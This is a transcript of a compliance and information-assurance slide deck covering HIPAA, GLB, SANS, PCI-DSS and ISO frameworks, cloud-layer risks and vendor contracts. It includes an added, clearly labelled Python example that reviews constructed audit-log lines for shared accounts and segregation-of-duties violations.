  Business Associate Contracts and Other Arrangements (164.308(b)(1)): Contractual Obligations with Service Providers (Business Associates), Cascading Liability
  Facility Access Controls (164.310(a)(1)): Access Controls, Maintenance of Records, Contingency Operations
  Access Control (164.312(a)(1)): Encryption, Decryption, Log-off, Emergency Access*
  Audit Controls (164.312(b)): Evidence of Review
  Transmission Security (164.312(e)(1)): Integrity Controls (A), Security and Integrity
  • 25. Gramm-Leach-Bliley (GLB) – FTC Enforcement
  Financial Services Firms have an obligation to safeguard non-public information (NPI) such as full account numbers, social security numbers (SSNs), etc.
  Obligations:
  • Privacy Notices
  • Non-Affiliated Third Parties & Opt Out
  • Ensure the Security & Confidentiality of Customer Records
  • Protect Against Anticipated Threats or Hazards
  • Protect Against Unauthorized Access
  The FTC has established a clear expectation of security as a corporate obligation.
  • 26. Security Frameworks
  Security Frameworks & Standards
  • SANS 20
  • PCI-DSS
  • ISO 27001/27002
  • Cloud Security Alliance
  • COBIT (ISACA)
  • 27. SANS Top 20 Security Controls
  The SANS Top 20 is considered a good set of minimum necessary security controls. The controls cover a broad suite of good control activity:
  • Critical Control 1: Inventory of Authorized and Unauthorized Devices
  • Critical Control 2: Inventory of Authorized and Unauthorized Software
  • Critical Control 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
  • Critical Control 4: Continuous Vulnerability Assessment and Remediation
  • Critical Control 5: Malware Defenses
  • Critical Control 6: Application Software Security
  • Critical Control 7: Wireless Device Control
  • Critical Control 8: Data Recovery Capability
  • Critical Control 9: Security Skills Assessment and Appropriate Training to Fill Gaps
  • Critical Control 10: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches
  • 28. SANS Top 20 Security Controls (Cont.)
  • Critical Control 11: Limitation and Control of Network Ports, Protocols, and Services
  • Critical Control 12: Controlled Use of Administrative Privileges
  • Critical Control 13: Boundary Defense
  • Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs
  • Critical Control 15: Controlled Access Based on the Need to Know
  • Critical Control 16: Account Monitoring and Control
  • Critical Control 17: Data Loss Prevention
  • Critical Control 18: Incident Response and Management
  • Critical Control 19: Secure Network Engineering
  • Critical Control 20: Penetration Tests and Red Team Exercises
  • 29. PCI-DSS 3.0 – 12 Requirements
  Requirement 1: Install and maintain a firewall configuration to protect cardholder data
  Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
  Requirement 3: Protect stored cardholder data
  Requirement 4: Encrypt transmission of cardholder data across open, public networks
  Requirement 5: Protect all systems against malware and regularly update anti-virus software or programs
  Requirement 6: Develop and maintain secure systems and applications
  https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf
  • 30. PCI-DSS 3.0 – 12 Requirements (Cont.)
  Requirement 7: Restrict access to cardholder data by business need to know
  Requirement 8: Identify and authenticate access to system components
  Requirement 9: Restrict physical access to cardholder data
  Requirement 10: Track and monitor all access to network resources and cardholder data
  Requirement 11: Regularly test security systems and processes
  Requirement 12: Maintain a policy that addresses information security for all personnel
  Requirement A.1: Shared hosting providers must protect the cardholder data environment
  https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf
  • 31. ISO 27001, CSA & ISACA
  Three organizations in particular are driving good security standards and practices that should be part of an organization’s control design:
  International Standards Organization (ISO)
  http://www.iso.org/iso/home/standards/management-standards/iso27001.htm
  Cloud Security Alliance (CSA)
  https://cloudsecurityalliance.org/
  Information Systems Audit and Control Association (ISACA)
  https://www.isaca.org/Pages/default.aspx
  • 32. COBIT – Cloud Governance
  ISACA’s “IT Control Objectives for Cloud Computing: Controls and Assurance in the Cloud” provides a solid framework for assessing controls in cloud environments and a reference for good governance.
  “ISACA defines governance as the set of responsibilities and practices exercised by the board and executive management with the goal of providing strategic direction, ensuring that objectives are achieved and ascertaining that risks are managed appropriately.”
  Leveraging cloud services requires controls and governance that touch upon the following:
  • Plan and Organize (PO)
  • Acquire and Implement (AI)
  • Deliver & Support (DS)
  • Monitor & Evaluate (ME)
  • 33. Technology and IA
  • Internet of Things (IoT)
  • Cloud Computing
  • 34. Internet of Things
  [Figure source: http://www.theregister.co.uk/2014/05/07/freescale_internet_of_things/]
  • 35. Service Demarcation & Information Assurance
  [Figure: the same stack (Applications, Database, O/S, Hypervisors, Servers, Storage, Networks, Backups) shown for each service model: On Site, Infrastructure (as a Service), Platform (as a Service), Software (as a Service)]
  Security, Monitoring & Governance: Critical Foundation
  Roles & Responsibilities are Crucial Regardless of the Service Model
  • 36. Application
  [Figure: the Application layer highlighted in the Data Center stack (Application, Database, OS, Hypervisors, Servers, Storage, Network, Backups), with Security Monitoring and ITIL / Service Management spanning every layer]
  • Audit Trail
  • Client
  • SaaS
  • Segregation of Duties
  • What is logged?
  • Who’s responsible for the application is based on the service model
  • How is the application impacted by other layers?
  • What information is shared among layers?
  • Shared administrative accounts?
  • 37. Cloud Layers – Application Risk
  Applications probably offer the widest array of risks to organizations. One of the key reasons…think about who uses applications…it’s us.
  Applications – Typical Risks:
  • Human error / social networking exposure / APT attacks
  • Segregation of duties / elevated privileges
  • Database linkages / poor data validation
  • Session-hacking, man-in-the-middle attacks, cross-site scripting
  • Poor application coding
  • Poor passwords (complexity/aging)
  • Poor logging habits
  • Many firewalls are not application aware (just ports 80, 443)
  • Other considerations?
  • 38. Database
  [Figure: the Database layer highlighted in the Data Center stack (Application, Database, OS, Hypervisors, Servers, Storage, Network, Backups), with Security Monitoring and ITIL / Service Management spanning every layer]
  • Database activity monitoring
  • Time-stamping transactions / logs
  • Memory-based databases…data living in memory
  • HADOOP and other changing non-database approaches to analytics
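  The three slides above (Application, Application Risk, Database) ask what is logged, who shares administrative accounts, whether duties are segregated, and whether transactions are time-stamped. This added example, which is not from the presentation, turns those questions into a review run over constructed application and database audit lines; the key=value format, the ten-minute window, and the three rules (one account seen from several source addresses, one person both creating and approving a payment, and any change to the audit log itself) are illustrative assumptions.

```python
"""Audit-trail review for the Application and Database slides (added example,
not from the presentation). Log format, sample lines and rules are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: application and database events, the last one missing its timestamp
SAMPLE_LOG = """\
2014-09-28T10:02:11Z user=dba_shared src=10.0.0.5 action=update table=payments
2014-09-28T10:03:40Z user=dba_shared src=10.0.0.9 action=delete table=audit_log
2014-09-28T10:05:02Z user=jsmith src=10.0.1.20 action=create_payment id=P-100
2014-09-28T10:06:15Z user=jsmith src=10.0.1.20 action=approve_payment id=P-100
2014-09-28T10:07:30Z user=mlopez src=10.0.1.31 action=approve_payment id=P-101
user=dba_shared src=10.0.0.5 action=select table=customers
"""


def parse_line(line):
    """Split one log line into (timestamp or None, {key: value})."""
    ts, fields = None, {}
    for tok in line.split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
        elif ts is None:
            try:
                ts = datetime.strptime(tok, "%Y-%m-%dT%H:%M:%SZ")
            except ValueError:
                pass
    return ts, fields


def review(log_text, window=timedelta(minutes=10)):
    """Return a list of (finding_kind, detail) tuples for the log text."""
    findings = []
    seen = defaultdict(list)   # user -> [(ts, src)] to spot one account used from many places
    created_by = {}            # payment id -> user who created it (segregation of duties)
    for line in log_text.splitlines():
        ts, f = parse_line(line)
        user, src, action = f.get("user"), f.get("src"), f.get("action")
        if ts is None:         # an event that cannot be ordered or correlated
            findings.append(("missing-timestamp", line))
            continue
        for prev_ts, prev_src in seen[user]:
            if prev_src != src and ts - prev_ts <= window:
                findings.append(("shared-account", "%s from %s and %s" % (user, prev_src, src)))
                break
        seen[user].append((ts, src))
        if action == "create_payment":
            created_by[f.get("id")] = user
        elif action == "approve_payment" and created_by.get(f.get("id")) == user:
            findings.append(("sod-violation", "%s created and approved %s" % (user, f.get("id"))))
        if f.get("table") == "audit_log" and action in ("update", "delete"):
            findings.append(("audit-trail-modification", "%s %s on audit_log" % (user, action)))
    return findings


if __name__ == "__main__":
    for kind, detail in review(SAMPLE_LOG):
        print(kind, "-", detail)
```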
  • 39. Service Provider Considerations
  Contracts Matter – Wrap-Around Agreements Present Risks to Organizations
  • Right to audit clause
  • Data location covenants
  • Compliance Reviews:
    o SSAE 16 SOC 1
    o ISAE 3402
    o SOC 2
  • Roles & Responsibilities
  • Statements of Work
  • 40. Common Themes
  • Inventory of Information
  • Inventory of Critical Assets
  • Supply-Chain / Vendor Assessments
  • Risk Assessments
  • Security Assessments
  • Board of Directors
  • Executive Responsibility
  • Investment in Training & Competencies
  • 41. Tijuana – San Diego (Our IA Ecosystem)
  Brier & Thorn – SOC in Tijuana: http://brierandthorn.com/
  BridgeSTOR – Cloud Data Encryption: http://bridgestor.com/
  CyberFlow Analytics – APT Solution: http://www.cyberflowanalytics.com/
  CyberTECH & CyberHive: http://cybertechnetwork.org/ and http://cyberhivesandiego.org/cybertech/
  InfraGard: http://www.infragardsd.org/
  ISACA – SD: http://isaca-sd.org/
  • 42. Quick Wins
  Information Assurance begins with:
  • Know Legal Obligations
  • Data Classification
  • Data Inventory
  • Data Retention
  • Privacy Impact Assessment
  • Security / Vulnerability Assessment
  • Keep The Board Informed – No Surprises
  • Assume a Breach!
  • 43. References
  Privacy
  https://www.privacyrights.org/data-breach/new
  http://www.hhs.gov/ocr/privacy/hipaa/administrative/breachnotificationrule/breachtool.html
  https://www.enisa.europa.eu/activities/identity-and-trust/risks-and-data-breaches/dbn
  Security
  https://www.isaca.org
  http://www.sans.org/
  http://www.nist.gov/cybersecurity-portal.cfm
  https://cloudsecurityalliance.org/
  • 44. us.redit.com
  Matt Stamper, MPIA, MS, CISA, ITIL (CIPP-US: Pending)
  T 858.836.02224
  M 760.809.2164
  E matt.stamper@redIT.com